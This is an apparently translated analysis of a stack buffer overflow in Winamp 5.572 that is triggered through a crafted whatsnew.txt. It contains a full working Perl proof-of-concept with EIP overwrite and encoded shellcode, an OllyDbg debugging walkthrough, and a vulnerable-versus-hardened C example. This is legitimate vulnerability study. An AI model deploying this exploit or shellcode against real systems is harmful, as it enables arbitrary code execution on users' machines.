Winamp, one of the most popular music players of the 1990s, still has a large number of loyal fans. Naturally it also has its share of vulnerabilities. What follows is an analysis of a buffer overflow that is triggered by opening the software's update history.
0x01 Reproducing the Vulnerability
The normal whatsnew.txt file is located in the Winamp folder and stores the software's update history. To reproduce the vulnerability, we overwrite the original whatsnew.txt with a specially constructed txt file, then open Winamp, select "About Winamp" from the Help menu, and choose "Version history" in the dialog that pops up. This triggers the exploit code and, for testing purposes, pops up a calculator. Thanks for the test environment and POC code that were provided.
0x02 Exploit Code Analysis
Now that the vulnerability has been triggered, we can analyze its cause. Let's first look at the POC code, which is written in Perl:
```perl
my $version = "Winamp 5.572";
my $junk    = "\x41" x 540;         # filler: 540 bytes of 0x41 ('A') up to the saved return address
my $eip     = "\xad\x86\x0e\x07";   # overwrite EIP with 0x070e86ad: FFD4 (call esp) in nde.dll
my $nop     = "\x90" x 100;         # NOP sled: 100 bytes of 0x90
my $shellcode =                     # windows/exec CMD=calc.exe
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a".
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e".
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54".
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64".
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f".
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f".
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d".
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44".
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35".
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a".
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b".
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57".
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b".
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63".
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59".
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73".
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63".
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33".
"\x30\x47";

# Write the payload out as whatsnew.txt: version + junk + eip + nop + shellcode
open(MyFile, '>>whatsnew.txt');
print MyFile $version.$junk.$eip.$nop.$shellcode;
print "[+] Whatsnew.txt written.\n";
print "[+] Now copy it to your Winamp folder...\n";
print "[+] Run Winamp and hit [About Winamp]->[Version history]\n";
```
Look first at the fourth statement from the bottom, which gives the layout of the exploit payload: five pieces in all, namely version + junk + eip + nop + shellcode. version is the current version of the software, here 5.572; junk is filler, here 540 bytes of 0x41 (capital A), whose purpose is to reach the return address that will be overwritten; eip is the return address we overwrite, here 0x070E86AD; the NOP sled is 100 bytes of 0x90; and last comes the shellcode itself.
0x03 Debugging the Vulnerability
To debug this vulnerability, we can use the whatsnew.txt we have just constructed. First locate where the vulnerability occurs, then set a breakpoint at a suitable spot and analyze from there. One common approach is to set a breakpoint on a function like strcpy and examine the calls one by one; another is to work up and down from a function like fopen. There are many methods, and basically any of them gets the job done. For this program, since we already know it opens the file whatsnew.txt, we might as well search for that string in the program and start the analysis there.
Start by loading Winamp.exe in OllyDbg (OD), right-click in the disassembly area, and choose Search for → All referenced text strings. Then select the topmost entry so the search starts from the beginning, right-click, choose Search for text, enter the string "whatsnew.txt", and click OK:
Next we look at the two results separately. These two statements may not themselves be arguments to fopen, but that does not matter; I believe they are not far from it. First, double-click the first result to jump to its disassembly, then look up and down from that position for a suspicious file-open statement:
We can set a breakpoint at 0x004015ee, press F9 to run the program, and trigger the vulnerability with the steps described earlier, so that the program stops at 0x004015ee. The first thing done here is a malloc call requesting 0x20000 bytes of memory; the return value is the address of the allocated space, which in my case is 0x0286c008. Then wfopen is called to open whatsnew.txt, followed by a call to fread. Analyzing the parameters of this call shows that fread reads the file contents into the space just allocated. Then strncmp is used for a comparison:
As you can see, the first 9 characters of the file are compared with "Winamp 5." to verify that the file being read is a whatsnew.txt; only then does the program proceed. This also explains why the version information has to be placed at the start of the exploit payload. Then comes the most important location, the string copy function:
Here the content read from whatsnew.txt is copied to the address 0x00bdebac. We can press F8 to step over this function and look at the result:
You can see that the program uses call esp; at that point ESP holds the address 0x00bdede8, which lands exactly in the 0x90 NOP sled, and right behind these 0x90 bytes is the shellcode.
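The read-and-copy pattern traced above (prefix check with strncmp, then an unbounded copy of file data into a fixed-size buffer) is shown here as an added example, not code from the original post or from Winamp, in both its vulnerable and hardened forms. DEST_SIZE, the function names and the sample file contents are assumptions; the 540-byte filler length comes from the POC.

```c
/* Added example, not code from the original post: the read-and-copy pattern the
 * analysis describes, in its vulnerable and hardened forms. DEST_SIZE, the
 * function names and the sample file contents are assumptions. */
#include <string.h>

#define VERSION_PREFIX "Winamp 5."  /* the 9-byte strncmp check seen in the debugger */
#define DEST_SIZE 256               /* assumed fixed-size destination; the POC's 540 filler bytes exceed it */

/* Vulnerable pattern: unbounded copy into a fixed stack buffer. Contrast only; never called. */
int copy_version_line_vulnerable(const char *filedata)
{
    char dest[DEST_SIZE];
    if (strncmp(filedata, VERSION_PREFIX, 9) != 0)
        return -1;
    strcpy(dest, filedata);         /* overflows dest once the line is longer than DEST_SIZE */
    return (int)strlen(dest);
}

/* Hardened form: same prefix check, then copy only the first line and only if it
 * fits. Returns bytes copied, -1 for a wrong prefix, -2 for an oversized line. */
int copy_version_line_hardened(const char *filedata, size_t filelen, char *dest, size_t destlen)
{
    const char *nl;
    size_t linelen;
    if (filelen < 9 || strncmp(filedata, VERSION_PREFIX, 9) != 0)
        return -1;
    nl = memchr(filedata, '\n', filelen);
    linelen = nl ? (size_t)(nl - filedata) : filelen;
    if (linelen >= destlen)
        return -2;                  /* refuse instead of silently truncating */
    memcpy(dest, filedata, linelen);
    dest[linelen] = '\0';
    return (int)linelen;
}

/* Runs the hardened copy over a constructed history file: a normal one, or one shaped
 * like the POC (version string followed by 540 filler bytes) when poc_shaped is nonzero. */
int check_hardened(int poc_shaped)
{
    char dest[DEST_SIZE], data[600];
    size_t n = 0;
    memcpy(data, "Winamp 5.572", 12); n = 12;
    if (poc_shaped) { memset(data + n, 'A', 540); n += 540; }
    memcpy(data + n, "\nWhat's new:\n", 13); n += 13;
    return copy_version_line_hardened(data, n, dest, sizeof dest);
}
```

check_hardened(0) returns 12 (the length of "Winamp 5.572"), while the POC-shaped input returns -2 because its first line is 552 bytes long.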
0X04 Summary
This time we have done a shellcode vulnerability analysis based on someone else's code. Clearly, even code written by a senior expert does not necessarily work as-is. Therefore we need to keep trying and studying, learn from others' ideas, and continuously improve.
Research on overflow vulnerability of Winamp stack